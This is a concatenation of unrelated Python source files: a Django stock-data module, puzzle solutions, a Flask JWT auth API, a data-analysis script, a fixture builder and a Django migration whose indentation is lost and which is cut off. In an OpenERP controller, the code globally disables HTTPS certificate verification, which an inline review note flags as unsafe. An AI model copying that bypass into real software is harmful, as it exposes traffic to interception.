    moment, evaluated per call (the original default was frozen at import
    time).

    Fixes the original, which compared ``d.strftime('%w')`` -- a *string*
    -- against the int constants 6/0 (never equal, so the Friday branches
    were unreachable) and computed the result from ``datetime.now()``
    instead of *d*.
    """
    if d is None:
        d = datetime.now()
    # datetime.weekday(): Monday == 0 ... Sunday == 6 (matches the
    # original sunday=6 / monday=0 constants; sqlite's convention differs).
    weekday = d.weekday()
    if weekday == 6:        # Sunday -> Friday
        days_back = 2
    elif weekday == 0:      # Monday -> Friday
        days_back = 3
    else:
        days_back = 1
    return (d - timedelta(days_back)).strftime('%Y-%m-%d')
def execScript4Mysql(conn, script):
    """Execute a ';'-separated SQL *script* statement by statement on
    *conn* and commit once at the end.

    Blank fragments (e.g. after a trailing ';') are skipped.
    """
    cursor = conn.cursor()
    for statement in script.split(';'):
        if statement.strip():
            cursor.execute(statement)
    conn.commit()
def useMemDb():
    """Swap the 'default' and 'default1' Django DB connection aliases,
    recreate the schema from myapp.sql on the new 'default', then copy
    the on-disk rows over via ``copyDiskDb2Memo()``.

    Presumably 'default1' is configured as an in-memory SQLite DB --
    TODO confirm against settings.  NOTE(review): the handle from
    ``open('myapp.sql')`` is never closed.
    """
    f = open('myapp.sql')
    sql = f.read()
    #cur = django.db.connections['default1'].cursor()
    # After this swap, 'default' refers to the former 'default1'
    # connection and vice versa.
    mem = django.db.connections['default1']
    django.db.connections['default1'] = django.db.connections['default']
    django.db.connections['default'] = mem
    cur = django.db.connection.cursor()
    cur.executescript(sql)
    copyDiskDb2Memo()
def save2DiskDb():
    """Re-save every row of the working tables through the 'default1'
    alias (the on-disk database once ``useMemDb()`` has swapped aliases).

    NOTE(review): the ``.raw("delete * from ...")`` calls almost
    certainly do nothing: ``QuerySet.raw()`` is lazy (the RawQuerySet is
    never iterated) and ``DELETE * FROM`` is not valid SQL anyway -- so
    the target tables are never cleared before rows are re-saved.
    """
    tblLst = []
    tblLst.append( Product.objects.all() )
    tblLst.append( Market.objects.all() )
    tblLst.append( KDaily.objects.all() )
    tblLst.append( KMin.objects.all() )
    tblLst.append( WatchList.objects.all() )
    Product.objects.using('default1').raw("delete * from myapp_product")
    Market.objects.using('default1').raw("delete * from myapp_market")
    KDaily.objects.using('default1').raw("delete * from myapp_kdaily")
    KMin.objects.using('default1').raw("delete * from myapp_kmin")
    WatchList.objects.using('default1').raw("delete * from myapp_watchlist")
    #for prod in prodLst1:
    for tbl in tblLst:
        for rec in tbl:
            rec.save(using='default1') ## ??? !!!
def copyDiskDb2Memo():
    """Re-save every row from the 'default1' database into the current
    'default' one (the in-memory DB after ``useMemDb()`` swapped aliases).

    NOTE(review): row-by-row ``save()`` issues one query per record;
    ``bulk_create`` would be much faster if primary keys allow it.
    """
    tblLst = []
    tblLst.append( Product.objects.using('default1').all() )
    tblLst.append( Market.objects.using('default1').all() )
    tblLst.append( KDaily.objects.using('default1').all() )
    tblLst.append( KMin.objects.using('default1').all() )
    tblLst.append( WatchList.objects.using('default1').all() )
    #for prod in prodLst1:
    for tbl in tblLst:
        for rec in tbl:
            rec.save(using='default') ## ??? !!!
    # NOTE(review): these querysets are lazy and never used -- likely
    # debugging leftovers.
    p = Product.objects.all()
    m = Market.objects.all()
    k = KDaily.objects.all()
    kM = KMin.objects.all()
    w = WatchList.objects.all()
def getWatchLst_ThsExport(fn):
    """Parse a 'Ths' watch-list export file into ``'<code>.<market>'``
    strings, keeping SZ/SH stocks only.

    Python 2 only (``except IOError, e`` and the ``<>`` operator).
    Returns '' when the file cannot be read.
    """
    try:
        with open( fn ) as fp: # HTTP Error 404: Not Found
            rslt = fp.readlines()
    except IOError, e:
        sys.stdout.write( 'except while access file:' + fn + 'IOError: ' + str(e) + '\r\n' )
        return ''
    wtchL = []
    for ln in rslt[1:]:  # first line is the header
        flds = ln.split('\t')
        # A purely numeric first column is treated as a Hong Kong code;
        # otherwise the column is '<MARKET><code>', e.g. 'SZ000001'.
        if flds[0].isdigit():
            market = 'HK'
            code = flds[0]
        else:
            market = flds[0][:2]
            code = flds[0][2:]
        if market not in [ 'SZ', 'SH' ]: #, 'HK' ]:
            continue
        # Keep only entries whose submarket code carries 'S' at index 2
        # (apparently the stock marker -- confirm against rules.Submarket).
        submarket = Submarket(market, code)
        if submarket=='' or submarket[2] <> 'S':
            continue
        wtchL.append( code+'.'+market )
    return wtchL
'''
p = Product.objects.get( code=code, market=market )
if p==None:
sys.stdout.write( 'product not found:' + code + '.' + market + '\r\n' )
continue
pWatch = WatchList(product=p, watchReason='')
pWatch.save()
'''
#for prod in SSEProdLst:
# getAStockRealtime()
# watchLst: prodCode market
def getDzhCodeLst(fn, market):
    """Bulk-import Product rows for *market* from a 'dzh' code-list file.

    Python 2 only (``except IOError, e``; ``.decode('GBK')`` on a byte
    string).  Returns '' when the file cannot be read, otherwise None.
    """
    try:
        with open( fn ) as fp:
            lines = fp.readlines()
    except IOError, e:
        sys.stdout.write( 'except while access file:' + fn + 'IOError: ' + str(e) + '\r\n' )
        return ''
    recLst = []
    for ln in lines[2:]:  # skips the first two lines (presumably headers)
        fLst = ln.strip().split('\t')
        #recLst.append( [p.id] + fLst[2:] )
        # Column 0 = code, column 1 = GBK-encoded product name.
        p=Product(source='dzh', code=fLst[0], type='', market=market, name=fLst[1].decode('GBK'), submarket = Submarket(market, fLst[0]), maskSite='.' ) #, bDataHist=False
        recLst.append(p)
    Product.objects.bulk_create( recLst )
'''
t = time.clock()
#useMemDb()
print('usememdb time: %.03f' % (time.clock()-t) )
t = time.clock()
save2DiskDb()
print('save2DiskDb time: %.03f' % (time.clock()-t) )
'''
|
# Read two integers and report which of them is the maximum.
num = int(input("enter your no:"))
Num = int(input("enter your no:"))
if Num > num:
    print(Num, "is maximum no")
else:
    # Fix: the original else branch printed "is not the maximum no."
    # without saying which number actually is the maximum.
    print(num, "is maximum no")
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenElanz
# Copyright (C) 2012-2013 Elanz Centre (<http://www.openelanz.fr>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
import ssl
import openerp
from openerp import http
from openerp import SUPERUSER_ID
from openerp.http import request
from openerp.tools.translate import _
from openerp.addons.web.controllers import main
from openerp.addons.web.controllers.main import Session
from datetime import datetime
import datetime
_logger = logging.getLogger(__name__)

# Globally disable HTTPS certificate verification when the runtime
# supports it.  NOTE(review): this affects every HTTPS request made by
# the whole process, not just this module -- a per-connection SSL context
# would be safer.  Also note the import block above binds ``datetime``
# twice ('from datetime import datetime' then 'import datetime'); the
# module import wins.
if hasattr(ssl, '_create_unverified_context'):
    ssl._create_default_https_context = ssl._create_unverified_context
class nstdaweb_docker_monitor_http(http.Controller):
    """Public HTTP API of the docker monitor.

    Every route authenticates the caller by (api_key, api_secret) against
    the ``nstdaweb.docker.monitor.source`` model and answers "-1" when
    required parameters are missing or the credentials are unknown.
    """

    @http.route('/app/nstdaweb_docker_monitor/get_port', auth='public')
    def index(self, api_key=None, api_secret=None, m=None):
        """Return the forecast port for machine *m* as a string."""
        if not (api_key and api_secret and m):
            return "-1"
        matched = request.env['nstdaweb.docker.monitor.source'].sudo().search(
            [('api_key', '=', api_key), ('api_secret', '=', api_secret)],
            limit=1)
        result = matched.sudo().forecast_port(m) if matched else '-1'
        return str(result)

    @http.route('/app/nstdaweb_docker_monitor/last_use', auth='public')
    def last_use(self, api_key=None, api_secret=None):
        """Return the matched source's last-use data as a string."""
        if not (api_key and api_secret):
            return "-1"
        matched = request.env['nstdaweb.docker.monitor.source'].sudo().search(
            [('api_key', '=', api_key), ('api_secret', '=', api_secret)],
            limit=1)
        result = matched.sudo().last_use_data() if matched else "-1"
        return str(result)

    @http.route('/app/nstdaweb_docker_monitor/standby', auth='public')
    def standby(self, api_key=None, api_secret=None):
        """Put the matched source into standby; return the outcome as a string."""
        if not (api_key and api_secret):
            return "-1"
        matched = request.env['nstdaweb.docker.monitor.source'].sudo().search(
            [('api_key', '=', api_key), ('api_secret', '=', api_secret)],
            limit=1)
        result = matched.sudo().set_standby() if matched else "-1"
        return str(result)
|
class Solution(object):
    def candy(self, ratings):
        """Minimum candies so every child gets >= 1 and any child rated
        higher than a neighbour gets more than that neighbour.

        :type ratings: List[int]
        :rtype: int
        """
        if not ratings:
            return 0
        count = len(ratings)
        candies = [1] * count
        # Left-to-right: enforce the constraint against the left neighbour.
        for i in range(1, count):
            if ratings[i] > ratings[i - 1]:
                candies[i] = candies[i - 1] + 1
        # Right-to-left: enforce the right-neighbour constraint without
        # breaking the pass above.
        for i in range(count - 2, -1, -1):
            if ratings[i] > ratings[i + 1]:
                candies[i] = max(candies[i + 1] + 1, candies[i])
        return sum(candies)
|
import re
REGEX = re.compile(r'(\d+) positions|position (\d+)')
class Disc:
    """One spinning disc: slot 0 is the opening, all other slots block."""

    def __init__(self, length, initial):
        # Slot 0 is open (0); the remaining length-1 slots are closed (1).
        self.positions = [0] + [1] * (length - 1)
        self.position = initial

    def open(self, time):
        """True when the disc's opening is aligned at *time*."""
        slot = (self.position + time) % len(self.positions)
        return self.positions[slot] == 0
def solve(data):
    """Return the earliest button-press time for the disc sculpture.

    A capsule pressed at time t reaches disc i (1-based) at time t+i, so
    t is the answer when every disc is open at t+i.

    Fixes the original scan, which advanced the candidate time by the
    number of discs it had checked instead of by one, skipping candidate
    times and potentially returning a later, wrong press time.
    """
    discs = []
    for line in data:
        # First regex match carries the disc length, second the start position.
        length = int(REGEX.findall(line)[0][0])
        position = int(REGEX.findall(line)[1][1])
        discs.append(Disc(length, position))
    t = 0
    while True:
        if all(disc.open(t + i) for i, disc in enumerate(discs, start=1)):
            return t
        t += 1
if __name__ == '__main__':
    # Read the puzzle input, one disc description per line.
    with open('input.txt') as f:
        data = f.read().splitlines()
    print(solve(data))
import datetime
from flask import request
from flask_jwt_extended import create_access_token
from api.models.user import User
from flask_restful import Resource
from mongoengine.errors import FieldDoesNotExist, ValidationError, DoesNotExist, NotUniqueError
from .errors import InternalServerError, EmailAlreadyExistsError, SchemaValidationError, UnauthorizedError
class SignupApi(Resource):
    """REST endpoint that registers a new user account."""

    def post(self):
        """Create a user from the JSON request body.

        Returns the new user's id on success (HTTP 200) and maps
        persistence failures onto the API's error hierarchy.
        """
        try:
            payload = request.get_json()
            new_user = User(**payload)
            new_user.hash_password()
            new_user.save()
            return {'id': str(new_user.id), 'message': 'Signup is successful'}, 200
        except (FieldDoesNotExist, ValidationError):
            raise SchemaValidationError
        except NotUniqueError:
            raise EmailAlreadyExistsError
        except Exception:
            raise InternalServerError
class LoginApi(Resource):
    """REST endpoint that authenticates a user and issues a JWT."""

    def post(self):
        """Check the posted credentials and return a 7-day access token."""
        try:
            credentials = request.get_json()
            account = User.objects.get(email=credentials.get('email'))
            if not account.check_password(credentials.get('password')):
                raise UnauthorizedError
            token = create_access_token(
                identity=str(account.id),
                expires_delta=datetime.timedelta(days=7))
            return {'token': token, 'message': f'{account.username} is authenticated'}, 200
        except (UnauthorizedError, DoesNotExist):
            # Wrong password and unknown email are deliberately
            # indistinguishable to the caller.
            raise UnauthorizedError
        except Exception:
            raise InternalServerError
|
# IMPORTS
import pandas as pd
from scipy.stats.stats import pearsonr
import zipfile
# EXTRA FUNCTIONS
# Function to iterate through columns
def getcolumn(matrix, col):
    """Return column *col* of *matrix* (a sequence of rows) as a list."""
    return [row[col] for row in matrix]
# PERSONALITY DATA
# Obtaining a list of the ids
dataunfiltered = pd.read_csv(r"...\TFG\AÑO PASADO\datos_def\ids_equivalence.csv")
data1 = dataunfiltered[dataunfiltered["genero"] == 1] # Women's ids
idslist = data1["id_rodrigo"].to_list()
# Obtaining personality data from experts
data2 = pd.read_excel(r"...\TFG\AÑO PASADO\datos_def\personalidad_2019.xlsx")
# Keep only the ids present in BOTH the id table and the personality sheet.
list1_as_set = set(data1["id_rodrigo"])
intersection = list1_as_set.intersection(data2["id_rodrigo"])
ids = list(intersection)
data = data2[data2["id_rodrigo"].isin(ids)]
# PERSONALITY FEATURES
# Obtaining all audio features
featuresunfiltered = pd.read_excel(r"...\TFG\AÑO PASADO\datos_def\audio_2019.xlsx")
all_features = featuresunfiltered[featuresunfiltered["id_rodrigo"].isin(ids)]
features = all_features
# VARIABLES
m_data = data.values
m_features = features.values
c_data = data.columns
c_features = features.columns
l_data = len(m_data[0])
l_features = len(m_features[0])
# CORRELATIONS
# Pearson-correlate every personality column (from index 2) against every
# audio-feature column (from index 1); the leading columns are presumably
# id/metadata -- confirm against the spreadsheets.
# NOTE(review): pearsonr pairs rows positionally, so both frames must be
# row-aligned by subject (same id order) -- verify before trusting results.
correlations = {}
i, j = 2, 1
while i < l_data:
    col_data = getcolumn(m_data, i)
    while j < l_features:
        col_features = getcolumn(m_features, j)
        correlations[str(c_data[i]) + "__" + str(c_features[j])] = pearsonr(
            col_data, col_features
        )
        j += 1
    i += 1
    j = 1  # restart the inner scan for the next personality column
result = pd.DataFrame.from_dict(correlations, orient="index")
result.columns = ["PCC", "p-value"]
# Keep only correlations significant at the 5% level.
potentialcorrelations = result.sort_index()[
    result.sort_index()["p-value"].between(0, 0.05)
]
# EXPORTATION
with zipfile.ZipFile("NEW-correlations2019.zip", "w") as csv_zip:
    csv_zip.writestr("NEW-all-correlations2019.csv", result.sort_index().to_csv())
    csv_zip.writestr(
        "NEW-potential-correlations2019.csv",
        potentialcorrelations.sort_index().to_csv(),
    )
|
# Both strings and lists are sequences of items.
c = ["H", 4, "Hello"]
print(c)
c.append(4)
print(c)
c.remove("H")
print(c)
c.remove(4)  # removes the first occurrence only
print(c)
print(dir(c))
# Fix: the list is ["Hello", 4] here, so the original c.remove(c[2])
# raised IndexError; remove the second (last) element instead.
c.remove(c[1])
# "" - empty string
# [] - empty list
|
from csv import reader
import json
import os
from dotenv import load_dotenv
from collections import defaultdict
load_dotenv()
def _read_rows(file_name):
    """Return the data rows of a CSV file, header line skipped."""
    with open(file_name, 'r') as csv_file:
        return list(reader(csv_file))[1:]


def _item_record(row):
    """Map one items-CSV row onto a core.Item fixture record."""
    record = defaultdict(dict)
    record['model'] = 'core.Item'
    record['pk'] = row[0]
    record['fields']['title'] = row[1]
    record['fields']['price'] = row[2]
    record['fields']['category'] = row[3]
    record['fields']['label'] = row[4]
    record['fields']['slug'] = row[5]
    record['fields']['description'] = row[6]
    record['fields']['image'] = 'images/' + row[7] + '.jpg'
    return record


def _item_variation_record(row, attachment):
    """Map one variation-CSV row onto a core.ItemVariation fixture record."""
    record = defaultdict(dict)
    record['model'] = 'core.ItemVariation'
    record['pk'] = row[0]
    record['fields']['variation'] = row[1]
    record['fields']['value'] = row[3]
    record['fields']['attachment'] = attachment
    return record


def _variation_record(pk, item_id, name):
    """Build one core.Variation fixture record (the variation *name*
    attached to item *item_id*)."""
    record = defaultdict(dict)
    record['model'] = 'core.Variation'
    record['fields']['item'] = item_id
    record['pk'] = pk
    record['fields']['name'] = name
    return record


def csv_to_item_table(file_name1, file_name2, file_name3):
    """Build the Django fixture ./core/fixtures/images_data.json.

    *file_name1* holds the items, *file_name2* the colour variations and
    *file_name3* the size variations.  Variation parents are generated
    for item ids 1-70: pks 1-70 are 'color', pks 71-140 are 'size'
    (size variation pk N belongs to item N-70).  Social-app records for
    Google/GitHub and the Site record are appended from environment
    variables.  Refactors the original's four copy-pasted record-building
    loops into helpers; output is unchanged.
    """
    data = [_item_record(row) for row in _read_rows(file_name1)]
    for row in _read_rows(file_name2):
        data.append(_item_variation_record(row, row[4]))
    data.extend(_variation_record(pk, pk, 'color') for pk in range(1, 71))
    for row in _read_rows(file_name3):
        data.append(_item_variation_record(row, 'images/' + row[4] + '.jpg'))
    data.extend(_variation_record(pk, pk - 70, 'size') for pk in range(71, 141))
    google_api = {
        'model': 'socialaccount.SocialApp',
        'pk': 1,
        'fields': {
            'provider': 'google',
            'name': 'googleapi',
            'client_id': os.getenv('GOOGLE_CLIENT_ID'),
            'secret': os.getenv('GOOGLE_SECRET_KEY'),
        }
    }
    github_api = {
        'model': 'socialaccount.SocialApp',
        'pk': 2,
        'fields': {
            'provider': 'github',
            'name': 'githubapi',
            'client_id': os.getenv('GITHUB_CLIENT_ID'),
            'secret': os.getenv('GITHUB_SECRET_KEY'),
            'key': os.getenv('GITHUB_KEY'),
        }
    }
    social_site = {
        'model': 'sites.Site',
        'pk': 1,
        'fields': {
            'domain': os.getenv('DOMAIN_NAME'),
            'name': os.getenv('DISPLAY_NAME'),
        }
    }
    data.extend([github_api, google_api, social_site])
    with open('./core/fixtures/images_data.json', 'w') as json_object:
        json_object.write(json.dumps(data, indent=4))
    print('Added csv file data to Json file...\n')
if __name__ == '__main__':
    # Source CSV files, expected in the working directory.
    csv_file_name1 = 'images_data.csv'
    csv_file_name2 = 'item color variations.csv'
    csv_file_name3 = 'item size variations.csv'
    # Build the Django fixture JSON from the three CSV files.
    csv_to_item_table(csv_file_name1, csv_file_name2, csv_file_name3)
|
# Generated by Django 4.0.5 on 2022-06-25 15:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0004_alter_live_data'),
]
operations = [
migrations.AddField(
model_name='game',
name='TOCGameT1L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCGameT1L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCGameT1L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCGameT1L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCGameT1L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCGameT1L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCGameT1L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCGameT2L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCGameT2L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCGameT2L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCGameT2L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCGameT2L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCGameT2L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCGameT2L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT1L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT1L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT1L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT1L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT1L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT1L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT1L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT2L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT2L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT2L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT2L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT2L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT2L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT2L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT1L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT1L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT1L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT1L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT1L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT1L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT1L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT2L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT2L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT2L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT2L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT2L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT2L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT2L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT1L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT1L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT1L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT1L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT1L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT1L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT1L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT2L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT2L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT2L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT2L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT2L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT2L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT2L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT1L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT1L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT1L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT1L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT1L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT1L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT1L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT2L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT2L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT2L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT2L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT2L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT2L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT2L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT1L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT1L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT1L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT1L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT1L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT1L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT1L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT2L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT2L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT2L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT2L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT2L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT2L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT2L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='goalsGameT1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='goalsGameT2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='goalsPeriodT1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='goalsPeriodT2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='lineOnT1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='lineOnT2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='nameL1',
field=models.CharField(max_length=50, null=True),
),
migrations.AddField(
model_name='game',
name='nameL2',
field=models.CharField(max_length=50, null=True),
),
migrations.AddField(
model_name='game',
name='nameL3',
field=models.CharField(max_length=50, null=True),
),
migrations.AddField(
model_name='game',
name='nameL4',
field=models.CharField(max_length=50, null=True),
),
migrations.AddField(
model_name='game',
name='nameL5',
field=models.CharField(max_length=50, null=True),
),
migrations.AddField(
model_name='game',
name='nameL6',
field=models.CharField(max_length=50, null=True),
),
migrations.AddField(
model_name='game',
name='nameL7',
field=models.CharField(max_length=50, null=True),
),
migrations.AddField(
model_name='game',
name='nameT1',
field=models.CharField(max_length=50, null=True),
),
migrations.AddField(
model_name='game',
name='nameT2',
field=models.CharField(max_length=50, null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT1L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT1L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT1L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT1L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT1L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT1L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT1L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT2L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT2L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT2L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT2L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT2L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT2L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT2L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT1L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT1L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT1L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT1L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT1L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT1L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT1L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT2L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT2L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT2L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT2L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT2L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT2L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT2L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='xGGameT1',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGGameT2',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
